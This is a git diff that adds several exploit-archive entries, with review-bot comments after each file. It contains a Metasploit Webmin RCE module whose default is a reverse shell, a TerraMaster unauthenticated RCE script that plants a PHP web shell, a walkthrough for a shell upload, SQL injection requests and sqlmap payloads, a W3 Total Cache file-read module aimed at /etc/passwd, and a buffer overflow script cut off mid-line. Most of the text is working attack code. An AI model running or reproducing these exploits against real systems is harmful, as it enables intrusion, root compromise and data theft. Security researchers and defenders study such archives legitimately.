diff --git a/exploits/linux/webapps/49318.rb b/exploits/linux/webapps/49318.rb
new file mode 100755
index 000000000..965213565
--- /dev/null
+++ b/exploits/linux/webapps/49318.rb
@@ -0,0 +1,165 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)',
+ 'Description' => %q(
+ This module exploits an arbitrary command execution vulnerability in Webmin
+ 1.962 and lower versions. Any user authorized to the "Package Updates"
+ module can execute arbitrary commands with root privileges.
+ It emerged by circumventing the measure taken for CVE-2019-12840.
+ s/\\(-)|\\(.)/string/g; escape is not enough for prevention.
+ Therefore, since the package name variable is placed directly in the system command,
+ we can manipulate it using some escape characters that HTTP supports.
+ For example, we can escape control by dropping the command line down one line.
+ We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly,
+ we must add double an ampersand(&&) to the end of the payload (%26%26)
+ ),
+ 'Author' => [
+ 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', 'CVE-2020-35606'],
+ ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html']
+ ],
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+ 'DisableNops' => true,
+ 'Space' => 512,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd'
+ }
+ },
+ 'DefaultOptions' =>
+ {
+ 'RPORT' => 10000,
+ 'SSL' => false,
+ 'PAYLOAD' => 'cmd/unix/reverse_perl'
+ },
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Targets' => [['Webmin <= 1.962', {}]],
+ 'DisclosureDate' => '2020-12-21',
+ 'DefaultTarget' => 0)
+ )
+ register_options [
+ OptString.new('USERNAME', [true, 'Webmin Username']),
+ OptString.new('PASSWORD', [true, 'Webmin Password']),
+ OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
+ ]
+ end
+
+ def peer
+ "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+ end
+
+ def login
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'session_login.cgi'),
+ 'cookie' => 'testing=1', # it must be used for "Error - No cookies"
+ 'vars_post' => {
+ 'page' => '',
+ 'user' => datastore['USERNAME'],
+ 'pass' => datastore['PASSWORD']
+ }
+ })
+
+ if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/
+ return $1
+ end
+
+ return nil unless res
+ ''
+ end
+
+ def check
+ cookie = login
+ return CheckCode::Detected if cookie == ''
+ return CheckCode::Unknown if cookie.nil?
+
+ vprint_status('Attempting to execute...')
+ # check version
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"),
+ 'cookie' => "sid=#{cookie}",
+ 'vars_get' => { "xnavigation" => "1" }
+ })
+
+ if res && res.code == 302 && res.body
+ version = res.body.split("Webmin 1.")[1]
+ return CheckCode::Detected if version.nil?
+ version = version.split(" ")[0]
+ if version <= "962"
+ # check package update priv
+ res = send_request_cgi({
+ 'uri' => normalize_uri(target_uri.path, "package-updates/"),
+ 'cookie' => "sid=#{cookie}"
+ })
+
+ if res && res.code == 200 && res.body =~ /Software Package Update/
+ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<")
+ return CheckCode::Vulnerable
+ end
+ end
+ end
+ print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<")
+ print_status("Please try with another user account!")
+ CheckCode::Safe
+ end
+
+ def exploit
+ cookie = login
+ if cookie == '' || cookie.nil?
+ fail_with(Failure::Unknown, 'Failed to retrieve session cookie')
+ end
+ print_good("Session cookie: #{cookie}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'),
+ 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" },
+ 'cookie' => "sid=#{cookie}"
+ )
+ unless res && res.code == 200
+ fail_with(Failure::Unknown, 'Request failed')
+ end
+
+ print_status("Attempting to execute the payload...")
+ run_update(cookie)
+ end
+
+ def run_update(cookie)
+ @b64p = Rex::Text.encode_base64(payload.encoded)
+ perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"'
+ payload = Rex::Text.uri_encode(perl_payload)
+
+ res = send_request_cgi(
+ {
+ 'method' => 'POST',
+ 'cookie' => "sid=#{cookie}",
+ 'ctype' => 'application/x-www-form-urlencoded',
+ 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'),
+ 'headers' =>
+ {
+ 'Referer' => "#{peer}/package-updates/?xnavigation=1"
+ },
+ # new vector // bypass to backslash %0A%7C{}%26%26
+ 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26"
+ # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages"
+ })
+ end
+end
\ No newline at end of file
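Review bot: `check` falls through to the "doesn't have the right to >>Package Update<<" message and `CheckCode::Safe` for every unhandled case, including a failed or non-302 `sysinfo.cgi` response, so an assessment run can report a host as safe when nothing was determined. Those paths should return `CheckCode::Unknown`, e.g. `return CheckCode::Unknown unless res && res.body`, and the privilege message should be printed only when the `package-updates/` request was actually answered. The test `version <= "962"` is a lexicographic string comparison; `Rex::Version.new("1.#{version}") <= Rex::Version.new('1.962')` compares the version numerically. `login` also passes `target_uri` to `normalize_uri` where the other requests pass `target_uri.path`.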
diff --git a/exploits/linux/webapps/49321.py b/exploits/linux/webapps/49321.py
new file mode 100755
index 000000000..b62e60274
--- /dev/null
+++ b/exploits/linux/webapps/49321.py
@@ -0,0 +1,66 @@
+# Exploit Title: TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
+# Date: 12/12/2020
+# Exploit Author: IHTeam
+# Full Write-up: https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
+# Vendor Homepage: https://www.terra-master.com/
+# Version: <= 4.2.06
+# Tested on: 4.1.30, 4.2.06
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import time
+import sys
+import urllib.parse
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+parser = argparse.ArgumentParser(description="TerraMaster TOS <= 4.2.06 Unauth RCE")
+parser.add_argument('--url', action='store', dest='url', required=True, help="Full URL and port e.g.: http://192.168.1.111:8081/")
+args = parser.parse_args()
+
+url = args.url
+headers = {'User-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36'}
+epoch_time = int(time.time())
+shell_filename = "debug"+str(epoch_time)+".php"
+
+def check_endpoint(url, headers):
+ response = requests.get(url+'/version', headers=headers, verify=False)
+ if response.status_code == 200:
+ print("[+] TerraMaster TOS version: ", str(response.content))
+ else:
+ print("\n[-] TerraMaster TOS response code: ", response.status_code)
+ sys.exit()
+
+def upload_shell(url, headers, shell_filename):
+ payload = "http|echo \"\" >> /usr/www/"+shell_filename+" && chmod +x /usr/www/"+shell_filename+"||"
+ payload = urllib.parse.quote(payload, safe='')
+ print("[/] Uploading shell...")
+ response = requests.get(url+'/include/makecvs.php?Event='+payload, headers=headers, verify=False)
+ time.sleep(1)
+ response = requests.get(url+'/'+shell_filename+'?cmd=id', headers=headers, verify=False)
+ if ('uid=0(root) gid=0(root)' in str(response.content, 'utf-8')):
+ print("[+] Upload succeeded")
+ else:
+ print("\n[-] Error uploading shell: ", response.content)
+ sys.exit()
+
+def interactive_shell(url, headers, shell_filename, cmd):
+ response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(cmd, safe=''), headers=headers, verify=False)
+ print(str(response.text)+"\n")
+
+
+def delete_shell(url, headers, shell_filename):
+ delcmd = "rm /usr/www/"+shell_filename
+ response = requests.get(url+'/'+shell_filename+'?cmd='+urllib.parse.quote(delcmd, safe=''), headers=headers, verify=False)
+ print("\n[+] Shell deleted")
+
+check_endpoint(url, headers)
+upload_shell(url, headers, shell_filename)
+try:
+ while True:
+ cmd = input("# ")
+ interactive_shell(url, headers, shell_filename, cmd)
+except:
+ delete_shell(url, headers, shell_filename)
\ No newline at end of file
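Review bot: `delete_shell` prints "[+] Shell deleted" without looking at the response, and it is reached only through the bare `except:` at the end of the script, so a failed clean-up goes unnoticed and the PHP file created under `/usr/www/` stays on the tested device. Clean-up belongs in a `finally:` block, and the function should confirm removal before reporting it, for example by requesting the file again and checking `response.status_code == 404`. The bare `except:` also hides every other error raised inside the loop; `except (KeyboardInterrupt, EOFError):` states the intended exits. Separately, the `#!/usr/bin/env python3` line sits below the header comments, where it has no effect as a shebang.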
diff --git a/exploits/php/webapps/49307.txt b/exploits/php/webapps/49307.txt
index 5c40e7e0c..05ded52b2 100644
--- a/exploits/php/webapps/49307.txt
+++ b/exploits/php/webapps/49307.txt
@@ -4,6 +4,7 @@
# Vendor: Phpgurukul
# Product Web Page: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
+# CVE: CVE-2020-35151
I DESCRIPTION
========================================================================
diff --git a/exploits/php/webapps/49310.txt b/exploits/php/webapps/49310.txt
new file mode 100644
index 000000000..4166d900e
--- /dev/null
+++ b/exploits/php/webapps/49310.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Victor CMS 1.0 - File Upload To RCE
+# Date: 20.12.2020
+# Exploit Author: Mosaaed
+# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
+# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
+# Version: 1.0
+
+# Tested on: Apache2/Linux
+
+Step1: register http://localhost/CMSsite-master/register.php
+step2: login as user
+step3: Go to Profile
+step4: upload imag as php file (upload shell.php)
+step5: update user
+step6: You will find your shell in img folder :/path/img/cmd.php
+
+http://localhost/CMSsite-master/img/cmd.php?cmd=id
+
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
\ No newline at end of file
diff --git a/exploits/php/webapps/49312.txt b/exploits/php/webapps/49312.txt
new file mode 100644
index 000000000..877268ee0
--- /dev/null
+++ b/exploits/php/webapps/49312.txt
@@ -0,0 +1,82 @@
+# Exploit Title: Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)
+# Date: 12-21-2020
+# Exploit Author: Matthew Aberegg, Alex Prieto
+# Vendor Homepage: https://pandorafms.com/
+# Patch Link: https://github.com/pandorafms/pandorafms/commit/d08e60f13a858fbd22ce6b83fa8ca391c608ec5c
+# Software Link: https://pandorafms.com/community/get-started/
+# Version: Pandora FMS 7.0 NG 750
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A blind SQL injection vulnerability exists in the "Network Scan" functionality of Pandora FMS.
+# Vulnerable Parameter : network_csv
+
+
+# POC
+
+POST /pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan&page=1 HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------308827614039434535382911921119
+Content-Length: 1597
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/pandora_console/index.php?sec=gservers&sec2=godmode/servers/discovery&wiz=hd&mode=netscan
+Cookie: PHPSESSID=i5uv0ugb4bdu9avagk38vcdok3
+Upgrade-Insecure-Requests: 1
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_manual_defined"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_select"
+
+300
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_text"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval"
+
+0
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="interval_units"
+
+1
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="taskname"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="id_recon_server"
+
+3
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv_enabled"
+
+on
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network_csv"; filename="test.txt"
+Content-Type: text/plain
+
+' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- a
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="network"
+
+
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="comment"
+
+test
+-----------------------------308827614039434535382911921119
+Content-Disposition: form-data; name="submit"
+
+Next
+-----------------------------308827614039434535382911921119--
\ No newline at end of file
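Review bot: The captured request publishes a real-looking session identifier in the `Cookie: PHPSESSID=...` header; a placeholder such as `PHPSESSID=<session id>` documents the request equally well, and the same applies to the three PHPSESSID values in 49314.txt. The header gives a patch link but does not name the release that contains it, so a reader cannot tell from this file which versions after 7.0 NG 750 are fixed. A `# Fixed in:` header line would close that gap if the authors know the release.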
diff --git a/exploits/php/webapps/49314.txt b/exploits/php/webapps/49314.txt
new file mode 100644
index 000000000..277304140
--- /dev/null
+++ b/exploits/php/webapps/49314.txt
@@ -0,0 +1,110 @@
+# Exploit Title : CSE Bookstore 1.0 - Multiple SQL Injection
+# Date : 2020-12-21
+# Author : Musyoka Ian
+# Version : CSE Bookstore 1.0
+# Vendor Homepage: https://projectworlds.in/
+# Platform : PHP
+# Tested on : Debian
+
+CSE Bookstore version 1.0 is vulnerable to time-based blind, boolean-based blind and OR error-based SQL injection in pubid parameter in bookPerPub.php. A successfull exploitation of this vulnerability will lead to an attacker dumping the entire database the web appliction is running on
+
+Below is results returned by SQLMap
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR NOT 4138=4138# Type: error-based
+Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' OR (SELECT 7393 FROM(SELECT COUNT(*),CONCAT(0x71717a7071,(SELECT (ELT(7393=7393,1))),0x7178716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nkDF
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: http://192.168.196.83:80/ebook/bookPerPub.php?pubid=' AND (SELECT 6293 FROM (SELECT(SLEEP(5)))eqTh)-- CJmT
+
+
+POC 1
+
+REQUEST
+========
+GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
+Host: 192.168.196.83
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
+Upgrade-Insecure-Requests: 1
+
+RESPONSE
+========
+
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:09:49 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 172
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''4''' at line 1
+
+POC 2
+Also the web application is vulnerable to a SQL Injection on cart.php file by sending a sql injection payload in bookisbn post data parameter
+
+REQUEST
+=======
+
+POST /ebook/cart.php HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/book.php?bookisbn=978-1-1180-2669-4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 57
+Cookie: PHPSESSID=igasmmkkf2thcc877pmjui05t9
+
+
+bookisbn=978-1-1180-2669-4'&cart=Purchase+%2f+Add+to+cart
+
+RESPONSE
+=======
+get book price failed! You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-1-1180-2669-4''' at line 1
+
+POC 3.
+Lastly bookisbn parameter on book.php is vunerable to SQL Injection which also has a High servierity since it could lead to dumping of database credentials
+
+REQUEST
+=======
+GET /ebook/book.php?bookisbn=978-0-7303-1484-4' HTTP/1.1
+Host: 192.168.196.83
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Referer: http://192.168.196.83/ebook/books.php
+Cookie: PHPSESSID=bvmt3vp30gjnr724helh37v2on
+
+RESPONSE
+========
+HTTP/1.1 200 OK
+Date: Mon, 21 Dec 2020 20:47:58 GMT
+Server: Apache/2.4.38 (Debian)
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate
+Pragma: no-cache
+Vary: Accept-Encoding
+Content-Length: 188
+Connection: close
+Content-Type: text/html; charset=UTF-8
+
+Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''978-0-7303-1484-4''' at line 1
\ No newline at end of file
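Review bot: The sqlmap output is fused at the first payload line: `Type: error-based` is stuck onto the end of the boolean-based payload, directly after its trailing `#`, so the error-based entry has no heading of its own. The file also stops at the proof of the three injection points (`pubid` in bookPerPub.php, `bookisbn` in cart.php and book.php) without any remediation line. The quoted MariaDB errors suggest the parameters are concatenated into the query and that database errors are echoed to the client, so a closing note recommending prepared statements and generic error pages would make the advisory usable for whoever has to fix the application.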
diff --git a/exploits/php/webapps/49315.txt b/exploits/php/webapps/49315.txt
new file mode 100644
index 000000000..8a0b431b1
--- /dev/null
+++ b/exploits/php/webapps/49315.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Library Management System 3.0 - "Add Category" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-22
+# Google Dork: N/A
+# Vendor Homepage: https://otsglobal.org/
+# Software Link: https://codecanyon.net/item/library-management-system-22/16965307
+# Affected Version: 3.0
+# Patched Version: Unpatched
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Admin.
+
+Step 2. Select "Book" from menu and select "Categories" from sub menu and
+after that click on "Add Category".
+
+Step 3. Insert payload - ">
in "Category Name"
+
+Step 4. Now Click on "Save" , Go to "Category" and See last , there you
+will get alert box.
\ No newline at end of file
diff --git a/exploits/php/webapps/49316.txt b/exploits/php/webapps/49316.txt
new file mode 100644
index 000000000..aecb5eb78
--- /dev/null
+++ b/exploits/php/webapps/49316.txt
@@ -0,0 +1,18 @@
+# Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS
+# Exploit Author: Kislay Kumar
+# Date: 2020-12-21
+# Google Dork: N/A
+# Vendor Homepage: https://www.ramomcoder.com/
+# Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324
+# Affected Version: 3.5
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step 1. Login as Super Admin.
+
+Step 2. Select "Branch" from menu and after that click on "Create Branch".
+
+Step 3. Insert payload - ">
in "Branch Name" ,
+"School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State".
+
+Step 4. Now Click on "Save" and you will get a list of alert boxes.
\ No newline at end of file
diff --git a/exploits/php/webapps/49317.rb b/exploits/php/webapps/49317.rb
new file mode 100755
index 000000000..75153361d
--- /dev/null
+++ b/exploits/php/webapps/49317.rb
@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Exploit::Remote::HTTP::Wordpress
+include Msf::Auxiliary::Scanner
+
+def initialize(info = {})
+super(
+update_info(
+info,
+'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
+'Description' => %q{
+This module exploits an unauthenticated directory traversal vulnerability
+in WordPress plugin
+'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
+the web server privileges.
+},
+'References' =>
+[
+['CVE', '2019-6715'],
+['WPVDB', '9248'],
+['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
+['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
+],
+'Author' =>
+[
+'VinhJAXT', # Vulnerability discovery
+'Hoa Nguyen - SunCSR Team' # Metasploit module
+],
+'DisclosureDate' => '2014-09-20',
+'License' => MSF_LICENSE
+)
+)
+
+register_options(
+[
+OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
+]
+)
+end
+
+def check
+check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
+end
+
+def run_host(ip)
+traversal = '../' * datastore['DEPTH']
+filename = datastore['FILEPATH']
+filename = filename[1, filename.length] if filename =~ %r{^/}
+
+json_body = { 'Type' => "SubscriptionConfirmation",
+'Message' => '',
+'SubscribeURL' => "file:///#{traversal}#{filename}"
+}
+
+res = send_request_cgi({
+'method' => 'PUT',
+'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
+'ctype' => 'application/json',
+'data' => JSON.generate(json_body)
+})
+
+fail_with Failure::Unreachable, 'Connection failed' unless res
+fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
+fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+
+print_status('Downloading file...')
+print_line("\n#{res.body}\n")
+
+fname = datastore['FILEPATH']
+path = store_loot(
+'w3_total_cache.traversal',
+'text/plain',
+ip,
+res.body,
+fname
+)
+print_good("File saved in: #{path}")
+end
+end
\ No newline at end of file
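Review bot: The `check` call passes `'0.9.26'` as the version in which the flaw was introduced, while the description gives the affected range as 0.9.2.6-0.9.3. Since `0.9.26` sorts above the fixed version `0.9.4`, the range is presumably empty and the check cannot flag an affected install; `check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.2.6')` matches the description. `'DisclosureDate' => '2014-09-20'` also disagrees with the 2019 CVE and write-up listed under `References` and should be confirmed. In `run_host`, the non-200 branch reports 'Connection failed' although a response was received, and `%r{^/}` would be more precise as `%r{\A/}` or `start_with?('/')`.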
diff --git a/exploits/php/webapps/49319.txt b/exploits/php/webapps/49319.txt
new file mode 100644
index 000000000..79534b2ad
--- /dev/null
+++ b/exploits/php/webapps/49319.txt
@@ -0,0 +1,64 @@
+# Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection
+# Exploit Author: Vijay Sachdeva
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code
+# Affected Version: Version 1
+# Tested on Kali Linux
+
+Step 1. Log in to the application with admin credentials.
+
+Step 2. Click on "Explore" and then select "Artworks".
+
+Step 3. Choose any item, the URL should be "
+
+http://localhost/art-bay/info_art.php?id=6
+
+Step 4. Run sqlmap on the URL where the "id" parameter is given
+
+
+sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner
+
+---
+
+
+Parameter: id (GET)
+
+ Type: boolean-based blind
+
+ Title: AND boolean-based blind - WHERE or HAVING clause
+
+ Payload: id=8 AND 4531=4531
+
+
+ Type: time-based blind
+
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+ Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG)
+
+
+ Type: UNION query
+
+ Title: Generic UNION query (NULL) - 9 columns
+
+ Payload: id=8 UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)--
+-
+
+---
+
+[08:18:34] [INFO] the back-end DBMS is MySQL
+
+[08:18:34] [INFO] fetching banner
+
+back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
+
+banner: '10.3.24-MariaDB-2'
+
+
+---
+
+
+Step 5. Sqlmap should inject the web-app successfully which leads to
+information disclosure.
\ No newline at end of file
diff --git a/exploits/php/webapps/49320.txt b/exploits/php/webapps/49320.txt
new file mode 100644
index 000000000..1e5bbafe3
--- /dev/null
+++ b/exploits/php/webapps/49320.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Faculty Evaluation System 1.0 - Stored XSS
+# Exploit Author: Vijay Sachdeva (pwnshell)
+# Date: 2020-12-22
+# Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code
+# Tested on Kali Linux
+
+Step 1: Log in to the application with admin credentials
+
+Step 2: Click on Questionnaires, then click "Action" for any Academic Year
+and then click manage.
+
+Step 3. Input "" in "Question" field of
+the Question form.
+
+Step 4. Click on "Save" when done and this will trigger the Stored XSS
+payloads. Whenever you click on Questionnaires, click action for any
+academic year, and then manage, your XSS Payloads will be triggered for
+that "Academic Year"
\ No newline at end of file
diff --git a/exploits/windows/local/49322.py b/exploits/windows/local/49322.py
new file mode 100755
index 000000000..a338228d0
--- /dev/null
+++ b/exploits/windows/local/49322.py
@@ -0,0 +1,78 @@
+# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
+# Date: 2020-12-22
+# Exploit Author: Florian Gassner
+# Vendor Homepage: https://www.10-strike.com/
+# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
+# Version: 9.05
+# Tested on: Windows 10 x64
+
+# Computer -> From Text File -> Choose exploit.txt
+
+import struct
+
+"""
+Message= - Pattern h1Ah (0x68413168) found in cyclic pattern at position 214
+"""
+
+OFFSET = 214
+
+"""
+badchars = '\x00\x09\x0a\x0d\x3a\x5c'
+"""
+
+"""
+Log data, item 23
+ Address=01015AF4
+ Message= 0x01015af4 : pop ecx # pop ebp # ret 0x04 | {PAGE_EXECUTE_READWRITE} [NetworkInventoryExplorer.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\NetworkInventoryExplorer.exe
+"""
+
+pop_pop_ret = struct.pack("